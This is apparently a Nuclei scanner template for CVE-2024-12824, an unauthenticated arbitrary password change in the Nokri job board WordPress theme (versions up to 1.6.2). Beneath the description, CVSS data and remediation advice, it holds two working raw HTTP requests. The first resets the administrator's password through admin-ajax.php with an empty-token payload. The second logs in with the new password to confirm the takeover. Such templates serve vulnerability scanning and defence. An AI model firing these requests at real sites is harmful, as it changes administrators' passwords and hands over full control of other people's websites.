id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior to updating user details such as the password. This makes it possible for unauthenticated attackers to change an arbitrary user's password, including administrators, and leverage that to gain access to their account.
  impact: |
    Unauthenticated attackers can change arbitrary user passwords, including administrators', enabling complete account takeover and site compromise.
  remediation: |
    Update the Nokri theme to a version newer than 1.6.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.48295
    epss-percentile: 0.97787
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth,vuln

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220797d3ce19220ef64035cd7724d77dd62f6566a9c4b6686783869be1db7e7aaf1022100c3fb67b791046d4d1eb44c7fae25bb52966ec31e203554d0376a96a30eb4f474:922c64590222798bb761d5b6d8e72950